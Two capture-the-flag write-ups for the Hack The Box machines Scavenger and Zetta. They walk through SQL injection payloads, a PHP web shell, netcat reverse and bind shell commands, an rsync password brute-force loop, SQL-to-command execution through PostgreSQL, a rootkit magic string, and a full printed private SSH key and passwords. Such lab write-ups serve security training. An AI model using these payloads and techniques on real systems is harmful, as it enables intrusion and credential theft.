Hack The Box - Scavenger Writeup

System information



Initial scan

Nmap shows some services active and listening


Checking each daemon manually I can see that:

  • FTP is  vsFTPd 3.0.3
  • SMTP is ib01.supersechosting.htb ESMTP Exim 4.89
  • HTTP is an Apache 2.4.25 on Debian. The standard page shows a vhost config error: 

  • WHOIS is backed by a MariaDB database:


Opening the web page www.supersechosting.htb (one of the virtualhosts) I see this:


Nothing special on this page...

Initial foothold

As far as I know (maybe I'm dumb) there are no known vulnerabilities in the services, so my focus is on the whois with a MariaDB, which might be vulnerable to SQL injection.
After some tries, the first successful SQL command I can run is  a classic "UNION SELECT"

# whois  -h 10.10.10.155 "') UNION SELECT table_schema, table_name, 1 FROM information_schema.tables; "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

1222 (21000): The used SELECT statements have a different number of columns

The server basically replies that I can run SQL statement but the syntax is not OK (number of columns is not correct.

# whois  -h 10.10.10.155 "') UNION SELECT  table_name,1 FROM information_schema.tables  -- ' "

The reply is:
ALL_PLUGINSAPPLICABLE_ROLESCHARACTER_SETSCOLLATIONSCOLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENABLED_ROLESENGINESEVENTSFILESGLOBAL_STATUSGLOBAL_VARIABLESKEY_CACHESKEY_COLUMN_USAGEPARAMETERSPARTITIONSPLUGINSPROCESSLISTPROFILINGREFERENTIAL_CONSTRAINTSROUTINESSCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLESSTATISTICSSYSTEM_VARIABLESTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGESTRIGGERSUSER_PRIVILEGESVIEWSGEOMETRY_COLUMNSSPATIAL_REF_SYSCLIENT_STATISTICSINDEX_STATISTICSINNODB_SYS_DATAFILESTABLE_STATISTICSINNODB_SYS_TABLESTATSUSER_STATISTICSINNODB_SYS_INDEXESXTRADB_RSEGINNODB_CMP_PER_INDEXINNODB_TRXCHANGED_PAGE_BITMAPSINNODB_FT_BEING_DELETEDINNODB_LOCK_WAITSINNODB_LOCKSINNODB_TABLESPACES_ENCRYPTIONXTRADB_INTERNAL_HASH_TABLESINNODB_SYS_FIELDSINNODB_CMPMEM_RESETINNODB_CMPINNODB_FT_INDEX_TABLEINNODB_SYS_TABLESPACESINNODB_MUTEXESINNODB_BUFFER_PAGE_LRUINNODB_SYS_FOREIGN_COLSINNODB_CMP_RESETINNODB_BUFFER_POOL_STATSINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGNINNODB_METRICSINNODB_FT_DEFAULT_STOPWORDINNODB_CMPMEMINNODB_SYS_TABLESINNODB_SYS_COLUMNSINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB_CMP_PER_INDEX_RESETXTRADB_READ_VIEWINNODB_SYS_SEMAPHORE_WAITSINNODB_CHANGED_PAGESINNODB_FT_DELETEDINNODB_TABLESPACES_SCRUBBINGcustomers

This means that there is a table named customers s
Then the next is to find the name of the columns of the table:
# whois  -h 10.10.10.155 "') UNION SELECT  column_name,1 FROM information_schema.columns where table_name='customers' -- ' "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 3 object

Iddomaindata

This means that the columns are id, domain and data.
That reveals the following domains:

  • Supersechosting.htb
  • Justanotherblog.htb
  • Pwnhats.htb
  • Rentahacker.htb

After adding the domain mapping to my DNS I can open the websites in a web browser to find that:
  • www. Supersechosting.htb looks like a plain html website
  • www.justanotherblog.htb has only a “under construction” log
  • www.Pwnhats.htb is an e-commerce site running PrestaShop on top of PHP, MySQL, PHPmyadmin
  • www.rentahacker.htb is a blog on wordpress 5.0


I tried to find some vulnerability or CVE but with no luck.
I then tried to run dirbuster on them with no valuable results.

So I turned to DNS service to find additional information, performing a zone transfer (AXFR):

The website http://sec03.rentahacker.htb shows a page with an image and leet speech that the site was owned.

Running dirbuster I can find a login page of Mantis Bug tracker:
But it seems not valuable or usable to trigger. 
Dirbuster also shows other pages:
  • wiki.php
  • shell.php

The last one seems very very interesting and its output is blank: maybe it accepts some parameters, but which one?
Wfuzz can help to find them.
The syntax is wfuzz -w wordfile http://URL/FUZZ=sometext: wfuzz will substitute FUZZ with words form the wordfile.

IN this case: 
It picks words from the file common.txt file and gets URLs like this:
  • http://sec03.rentahacker.htb/shell.php?admin=ls
  • http://sec03.rentahacker.htb/shell.php?cmd=ls
  • http://sec03.rentahacker.htb/shell.php?ftp=ls

The output is this one:

Where the 200 is the HTTP response code and the 0 in the columns means a reply with 0 lines, 0 word and 0 chars of output.

I let it run until I see a non zero output:

Corresponding to the parameter hidden

The next step is to use this parameter opening the URL http://sec03.rentahacker.htb/shell.php?hidden=ls 
Now I found a way to execute commands, it's time to try some commands.

First of all a ping back to my computer... and it works!

Next a reverse connection to my computer (telnet 10.10.16.65 6666), but it doesn't work.


Next a bind shell with nc -lvp 6666 -e /bin/sh but it's not working either.

User Escalation (more than one)


So I believe it's time to look into the filesystems. First look is in /home and there are some folders:
  • ib01c01
  • ib01c02
  • ib01c03
  • ib01ftp
  • ib01wwwsupport
Looks like it will a long journey if I have to escalate more than one user...
The first look is in /home/ib01c03/www/ where I can find a wp-config.php but the output is not helpful


I can encode it with base64 and copy/paste the content to my machine and decode it


Looks like there is an account
  • Username:   ib01c03
  • Password:    Thi$sh1tIsN0tGut
Unfortunately it's not valid for SSH but it works with FTP
Connecting to it, I can look into his home, but no valuable content....
Tough there is something in /var/mail (which contains the user mail):
So now I  have an additional ftp account:

  • User ib01ftp
  • Pass: YghRt56_Ta
Connecting to FTP as user ib01ftp I can find two folders


In the first one there is a note.txt file, a pcap and a log file


The note.txt file gives an hint to look into the pcap file

OPening the pcap file with wireshark I can filter the HTTP streams and the 20th tcp stream 

So I believe we can find some juicy content in the pcap file

Looking into TCP streams I can find the  “tcp.stream eq 20” a POST to an admin dashboard with username and password



Username: pwnhats@pwnhats.htb
Password:    GetYouAH4t!

OPening it with web browser I can see that it is the admin dashboard of Prestashop E-commerce

In another tcp flow I see that there is a specific POST call that use a Proxy settings in the IMAP section that is prone to RCE. 


The part in the red circle can be decoded as a reverse shell netcat:


This is confirmed on the scavenger machine 



The next step is to use Burp to replicate this POST request to execute commands like a ping back to my computer:


I can try to execute commands like netcat but I think the connection are blocked, so I choose to upload a shell2.php file with a command like this one:
echo "<?php echo \"<pre>AAAA\"; \$cmd=(\$_REQUEST['cmd']); system(\$cmd);  ?>"  > shell2.php 

I encode it as base64 and put int BURP  and use it:



I'm able to execute commands as user ib01c01 (please ignore the "AAAA" strings I added during debugging.

Next I can execute ls in the home folder and show the user.txt file which contains the user flag

The file access.txt contains credentials for user ib01c01 valid for FTP but not for SSH:
Connecting to FTP I can see the content of the home:

But the .ssh folder is not writable, so no way to put a SSH public key to get shell access...
Also the other folder doesn't contain anything valuable.

Just for curiosity I can get to the startup iptables rules in /etc and see why the reverse shell is not working (basically only traffic on the ports of the listening services can flow in INPUT and OUTPUT:


Root Escalation

For this escalation I need to go back to the PCAP file.
Looking to TCP streams from the end of the file, I can see that there are some encrypted communication on port 4444 and 4445.
Just before this stream there is an HTTP (port 80) that can be filter with "tcp.stream eq 20". It downloads a file root.c:

Looking at it and searching the Internet, it seems that this is a rootkit for Linux.
Basically, it is a LKM that create a char device named /dev/ttyR0.
When a standard user send a special string to this device, its shell gets elevated privileges.

In the original code the magic string is g0tR0ot

So a command like 
echo "g0tR0ot" > /dev/ttyR0; id
will run id command as root

In the case of Scavenger I run the command lsmod

It seems that the machine has the LKM loaded.
But the command above is not elevating priveleges...

I believe that the LKM was compiled with a different magic string.
The compiled module (.ko file) can be found in “/home/ib01c01/…/” (note the space in front of the fiolder name) and can be downloaded with FTP.

With objdump tool I can disassmble and look into the code.
In a section of the code I can find the instructions that defines the magic value (the two movl below)


The magic word is defined by the hex string 67 33 74 50 72 31 76 which decoded to ASCII is g3tPr1v



So now using this string, I can execute id as root:

So it's only a matter of viewing the /root filder and discloses the content of some files

Credits.txt contains information on the LKM


root.txt contains the root flag




Hack The Box - Zetta Writeup

MACHINE DATA

  • IP address: 10.10.10.156
  • OS:             Linux
  • Rating:         Hard
  • Points:         40
  • Phased out: Feb 21st 2020

Initial foothold and user 

Nmap reveals only the following services
  1. SSH
  2. FTP
  3. HTTP
Looking into the main webpage we can find two hints.

  • Any 32 char combination are valid user and password for ftp service: this doesn’t lead to an access to files or folders and it doesn’t seem to be vulnerable (PureFTPd)
  • The webpage mentionsRFC 2428 which defines FXP extension for FTP protocol: maybe this FTP supports FXP extensions
The feature describe in the RFC 2428 is related to IPV6 that combined with FXP extension can lead to disclosure of IPv6 address of the Zetta server.
I can connect to port 21 with telnet and type in any 32 hex sequence as user and password

At the same time I can start a tcpdump session on my tun0 interface (the interface used by the VPN to hackthebox) which has an IPv6 address: dead:beef:4::100f


Now I can use the command EPRT (define in RFC 2428) to tell the FTP that my computer can be contacted on port 26000 for FXP extensions.
And then use a command STOR pass.txt to use this FXP extensions.

The file pass.txt is not needed: I only need Zetta  to contact my computer on port 26000 and on IPv6 protocol to find Zetta IPv6 address:

And looking at tcpdump output:

I can find the IPv6 address of Zetta is: dead:beef::250:56ff:febd:1dbe

And the next step is to scan Zetta on IPv6:

There is an additional port that can be interesting.
I can connect to it and find that it is a rsync server used for backup purposes.

So now I can try to get a copy of /etc/ folder from remote server to my local computer:


rsync -6  rsync://root@[dead:beef:0:0:250:56ff:febd:1dbe]:8730/etc/* rsync/

Unfortunately the /etc/ folder doesn't reveal any secrets (shadow file or other things), but there is the rsync configuration file that has an interesting section:

[home_roy]
        path = /home/roy
        read only = no
        # Authenticate user for security reasons.
        uid = roy
        gid = roy
        auth users = roy
        secrets file = /etc/rsyncd.secrets
        # Hide home module so that no one tries to access it.

        list = false

There is a misconfiguration because the folder is not in read only, so the user roy can use rsync to upload files

First step is to get a copy of the folder but I don't have the password of roy user so I have to bruteforce it with rockyou

for i in $(head -n 1000 rockyou.txt); do
     echo $i;
     echo $i| rsync -6 --password-file=- rsync://roy@[dead:beef:0:0:250:56ff:febd:871]:8730/home_roy/* roy ;
     if [ $? -eq 0 ];
     then
           echo password is $i
           exit 1
     fi
done

After a few minutes I got the password of roy, which is computer

Using rsync I can get a copy of roy home and I can find a .tudu.xml file in it which contains an obscure hint which will be useful later for root escalation:



I can leverage the write option to upload an authorized_keys file of my choice to use for SSH authentication:


root@NikITA:~/HTB/Zetta# rsync -6 -a authorized_keys   rsync://roy@[dead:beef::250:56ff:febd:871]:8730/home_roy/.ssh/
****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

You must have explicit, authorized permission to access this rsync
server. Unauthorized attempts and actions to access or use this
system may result in civil and/or criminal penalties.

All activities performed on this device are logged and monitored.

****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

@ZE::A staff

This rsync server is solely for access to the zetta master server.
The modules you see are either provided for "Backup access" or for
"Cloud sync".


Password:
root@NikITA:~/HTB/Zetta# ssh roy@10.10.10.156
Linux zetta 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64
Last login: Sat Aug 31 15:43:18 2019 from 10.10.14.2
roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
roy@zetta:~$ cat user.txt
a575bdb345f2de0a3172c8282452be91
roy@zetta:~$ 


That concludes user escalation for Zetta

Root escalation

Looking around with roy user I found a git repo in /etc/rsyslog.d folder: this containes the config file of rsyslog that has a special config to store log messages in postgreSQL database.
Here is the config:
template(name="sql-syslog" type="list" option.sql="on") {
  constant(value="INSERT INTO systemevents (message, devicereportedtime) values ('")
  property(name="msg")
  constant(value="','")
  property(name="timereported" dateformat="pgsql" date.inUTC="on")
  constant(value="')")
}

# load module
module(load="ompgsql")

# Only forward local7.info for testing.
local7.info action(type="ompgsql" server="localhost" user="postgres" pass="*******" db="Syslog" template="sql-syslog")

I believe that there is a way to exploit this by triggering a specially crafted syslog message
The exploitation requires some effort to find the correct message so I decide to reproduce the config on my machine and try many combinations until I find a way to execute code.

The basic idea here is to use the logger command with the correct facility to send a message with the correct quote and escaping characters to execute SQL commands in PostgreSQL.
For example I was able to get the version of PostegreSQL with this command:

echo "',NULL); SELECT version();-- “ | logger -p local7.info

The version of the postgreSQL will be written in the table systemevents.
The reasons of reproducing the setup on my machine is that I can look at the PostgreSQL content, while i don't have any credetnails on Zetta for that.
Now that I can execute SQL commands I can leverage CVE-2019-9193 as stated on
PayloadsAllTheThings to execute Linux OS commands from inside PostgreSQL.

The original exploit is
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';


But I have to "encapsulate" it in the logger messages like this (please note the special escaping \$$ to get the apostrophe character to be correctly sent to PostgreSQL:
echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ id \$$;-- "  | logger -p local7.info

Once I'm able to execute commands, I can do anything, like listing content of folder, with some ls commands I can find that postgresql has a private ssh key, and I can copy it in tmp and make world readable with this commands:

echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ cp /var/lib/postgresql/.ssh/id_rsa /tmp/a \$$;-- "  | logger -p local7.info


echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ chmod 777 /tmp/a \$$;-- "  | logger -p local7.info


The content of the id-rsa key is:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

And I can use it to connect to zetta as postgres user:

Once inside as postgres user I can look at the history and I can find the command that originally created the postgres user as:


So the postgres user has a password: sup3rs3cur3p4ass@postgres

Remembering the hint in .tudu.xml file I can guess that the password of root user is sup3rs3cur3p4ass@root

And, yes it is: